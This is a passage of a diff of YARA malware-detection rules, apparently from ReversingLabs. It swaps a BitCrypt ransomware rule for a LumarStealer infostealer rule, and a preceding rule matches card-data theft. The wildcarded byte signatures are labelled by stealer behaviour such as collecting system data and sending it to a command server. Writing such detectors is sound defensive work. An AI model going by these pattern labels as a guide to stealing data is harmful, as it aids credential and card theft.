?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 55 + ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 + ?? ?? ?? ?? 50 8D 55 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? + ?? ?? 84 C0 0F 84 + } + $form_create_2 = { + 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B C3 E8 ?? ?? ?? ?? 05 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 55 ?? + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? + ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B C3 E8 + } + $form_create_3 = { + B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 33 C9 + BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? + 8B 4D ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 33 C9 BA ?? ?? ?? + ?? 8B C3 E8 ?? ?? ?? ?? 33 C9 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? + ?? 8B C3 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 09 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? + A3 ?? ?? ?? ?? BA ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? A1 ?? + ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 84 + C0 74 } condition: - uint16(0)==0x5A4D and $find_files and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and ($calc_luhn and $track_1_reverse and $check_validity_1 and $encode_and_send_1 and $form_create_1 and $form_create_2 and $form_create_3) } -import "pe" - -rule REVERSINGLABS_Win32_Ransomware_Bitcrypt : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Infostealer_Lumarstealer : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects BitCrypt ransomware." + description = "Yara rule that detects LumarStealer infostealer." author = "ReversingLabs" - id = "f00a0fd8-31a9-5ee6-b560-09ccf6fe490b" - date = "2020-07-15" - modified = "2020-07-15" + id = "a1358846-7cc2-53ac-89a9-c6c99f492284" + date = "2023-12-07" + modified = "2023-12-07" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.BitCrypt.yara#L3-L112" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "66cfe16a182e7f20d6358be9569ada5e6c36c94d44781d8c741638e1b174d44e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/infostealer/Win32.Infostealer.LumarStealer.yara#L1-L190" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0bc9e12396b1e85f69b965e9ea50960c59c50aba40317fb4de8f6abd092ec7d2" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "BitCrypt" + tc_detection_type = "Infostealer" + tc_detection_name = "LumarStealer" tc_detection_factor = 5 importance = 25 strings: - $bc_bcdedit = { - 55 8B EC 6A ?? 53 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3 - E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 45 - ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? - ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? - 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? C3 + $collect_os_information_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 B8 ?? ?? ?? ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1 66 + A3 ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? + 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 + 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 + 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? C6 45 ?? ?? EB ?? 8A 45 ?? 04 ?? 88 45 ?? 0F B6 4D + ?? 83 F9 ?? 73 ?? 0F B6 55 ?? 0F B7 44 55 ?? 0F B7 0D ?? ?? ?? ?? 3B C1 75 ?? FF 25 + ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 89 55 ?? 89 55 ?? C7 45 ?? ?? + ?? ?? ?? 8D 75 ?? B8 ?? ?? ?? ?? 33 C9 0F A2 89 06 89 5E ?? 89 4E ?? 89 56 ?? B8 ?? + ?? ?? ?? 6B C8 ?? 8B 54 0D ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? + 89 45 ?? 8B 4D ?? 3B 4D ?? 77 ?? 8D 75 ?? 8B 45 ?? 33 C9 0F A2 89 06 89 5E ?? 89 4E + ?? 89 56 ?? 81 7D ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 55 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? EB ?? 81 7D ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 C4 ?? EB ?? 81 7D ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 4D ?? 51 68 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 80 ?? ?? ?? + ?? ?? 8D 95 ?? ?? ?? ?? 52 B8 ?? ?? ?? ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 + ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? + ?? 50 B9 ?? ?? ?? ?? D1 E1 8B 91 ?? ?? ?? ?? FF D2 8B 45 ?? A3 ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? 6A ?? BA ?? ?? ?? ?? 6B C2 } - $bc_enum_drives_a_z = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 D2 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B F0 33 C0 55 68 ?? ?? ?? - ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 06 B3 ?? 8D 85 ?? ?? ?? ?? 8B D3 E8 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? - 8D 45 ?? B1 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B D3 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 E8 ?? 75 1B 8D 85 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? - ?? 8B 06 8B 08 FF 51 ?? 43 80 FB ?? 0F 85 65 FF FF FF 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? C3 + $collect_os_information_p2 = { + 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? 6B D1 ?? 8B 82 ?? ?? ?? ?? FF + D0 85 C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? A3 ?? ?? + ?? ?? 89 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? + FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? 51 + 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? A3 ?? ?? ?? ?? 8B 4D ?? 89 + 0D ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 6A ?? B9 ?? ?? ?? ?? C1 E1 ?? 8B 91 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ?? + ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 73 ?? 8B 4D ?? 83 C1 ?? 89 4D ?? EB + ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 83 7D ?? ?? 73 ?? 8B 45 ?? 0F B7 0C 45 ?? ?? ?? ?? 8B + 55 ?? 0F B7 04 55 ?? ?? ?? ?? 3B C8 75 ?? 33 C9 8B 55 ?? 66 89 0C 55 ?? ?? ?? ?? EB + ?? EB ?? 5E 5B 8B E5 5D C3 } - $bc_do_extensions_1 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D - ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 7D ?? 8B 5D ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? - ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? - ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 81 01 00 00 E8 ?? ?? ?? ?? BA ?? - ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? 8B F0 8B C3 8B 14 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 28 A0 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? - 50 8B 03 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 85 C0 75 C8 EB 28 A0 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8B 03 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B - C3 E8 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 C8 FF 75 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? DB 85 ?? ?? ?? ?? 83 C4 ?? DB 3C + $send_data_to_c2_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B D1 + ?? 8B 82 ?? ?? ?? ?? FF D0 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 4D ?? 68 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 66 89 45 ?? 6A ?? 6A ?? 0F BF 55 ?? 52 B8 ?? ?? ?? + ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A + ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? + 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? + ?? ?? ?? EB ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 83 7D ?? ?? 7D ?? 8B 45 ?? 0F B7 8C 45 ?? + ?? ?? ?? 83 F9 ?? 75 ?? 8B 55 ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? EB ?? EB ?? + 8B 4D ?? 0F B7 94 4D ?? ?? ?? ?? 85 D2 74 ?? 8B 45 ?? 8B 4D ?? 8A 94 4D ?? ?? ?? ?? + 88 54 05 ?? 8B 45 ?? 0F BE 4C 05 ?? 83 F9 ?? 75 ?? 8B 55 ?? C6 44 15 ?? ?? EB ?? 8D + 45 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 0F + B6 15 ?? ?? ?? ?? 83 FA ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? B8 + ?? ?? ?? ?? C1 E0 ?? 8A 4D ?? 88 88 ?? ?? ?? ?? 0F B6 15 ?? ?? ?? ?? 83 FA ?? 75 } - $bc_do_extensions_2 = { - 24 9B 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B C7 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 13 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 17 8D 85 ?? ?? ?? ?? E8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B3 ?? EB 02 33 DB 33 C0 5A 59 59 64 89 10 EB 0C E9 ?? ?? ?? ?? 33 DB E8 ?? ?? - ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB D0 8B C3 5F 5E 5B 8B E5 5D C2 + $send_data_to_c2_p2 = { + C7 45 ?? ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6B C8 ?? 8A 55 ?? 88 + 91 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 83 F8 ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? C7 45 + ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B D1 ?? 8A 45 ?? 88 82 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B + D1 ?? C6 82 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6B C8 ?? 8A 15 ?? ?? ?? ?? 88 91 ?? ?? ?? + ?? B8 ?? ?? ?? ?? 6B C8 ?? C6 81 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 85 D2 74 ?? 6A ?? 8D + 45 ?? 50 8B 4D ?? 51 BA ?? ?? ?? ?? D1 E2 8B 82 ?? ?? ?? ?? FF D0 83 F8 ?? 74 ?? 6A + ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 BA ?? ?? ?? ?? 6B C2 ?? 8B 88 ?? ?? ?? + ?? FF D1 83 F8 ?? 74 ?? 6A ?? 8B 55 ?? 83 C2 ?? 52 8B 45 ?? 50 8B 4D ?? 51 BA ?? ?? + ?? ?? 6B C2 ?? 8B 88 ?? ?? ?? ?? FF D1 83 F8 ?? 74 ?? EB ?? 68 ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 B8 ?? ?? ?? ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1 + BA ?? ?? ?? ?? 6B C2 ?? 8B 88 ?? ?? ?? ?? FF D1 B8 ?? ?? ?? ?? EB ?? 33 C0 8B E5 5D + C3 } - $bc_do_files_1 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 8B F0 - 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B3 ?? 8B 06 E8 ?? ?? ?? ?? - 89 45 ?? 8B 16 8D 85 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B F8 85 FF 0F 85 91 00 00 00 F6 85 ?? ?? ?? ?? ?? 75 73 56 8D B5 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A5 - 5E 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 33 D2 E8 ?? ?? ?? ?? 83 C4 ?? DD 1C 24 9B 8D 45 ?? E8 - ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 36 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? - ?? ?? 8B 45 ?? 8B 40 ?? 8B 00 8B 08 FF 51 ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 6F FF FF FF 8D 85 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 84 DB 0F 84 B7 00 00 00 8B 16 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D + $find_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? + ?? 52 A1 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? 6B D1 ?? 8B 82 ?? ?? ?? ?? FF D0 89 45 ?? 8B + 0D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 D2 8B 0D ?? ?? ?? ?? 66 89 54 41 ?? 83 + 7D ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 15 ?? + ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 66 89 45 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? + 83 C4 ?? 0F B7 4D ?? 8D 54 08 ?? 81 FA ?? ?? ?? ?? 72 ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 8B 0D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 + C4 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? + ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 74 ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 25 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 + ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? + ?? ?? ?? 66 89 4D ?? 33 D2 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 } - $bc_do_files_2 = { - 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 75 7E F6 85 ?? ?? ?? ?? ?? 74 64 8B 85 ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 74 52 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 40 FF 36 FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B - C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8B C6 8B 55 ?? E8 57 FE FF FF 59 84 C0 75 04 33 DB EB 21 8B 55 ?? 42 8B C6 - B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 82 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 - 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 + $find_files_p2 = { + 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 33 C9 66 89 4D ?? BA + ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? + 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 + 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA + ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? 33 D2 + 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 + 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 33 C9 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 + ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0 + 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 + 89 45 ?? 33 C9 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 + ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0 66 89 45 ?? B9 ?? ?? ?? ?? + 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 + 89 4D ?? 33 D2 66 89 55 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? + 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 } - $bc_main_1 = { - 55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 F9 53 56 57 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 - 89 20 33 C0 A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? - ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? - ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? - ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? - ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? - ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 8D 45 ?? 8B 0D ?? ?? ?? ?? - 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 7A 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B + $find_files_p3 = { + C0 0F 85 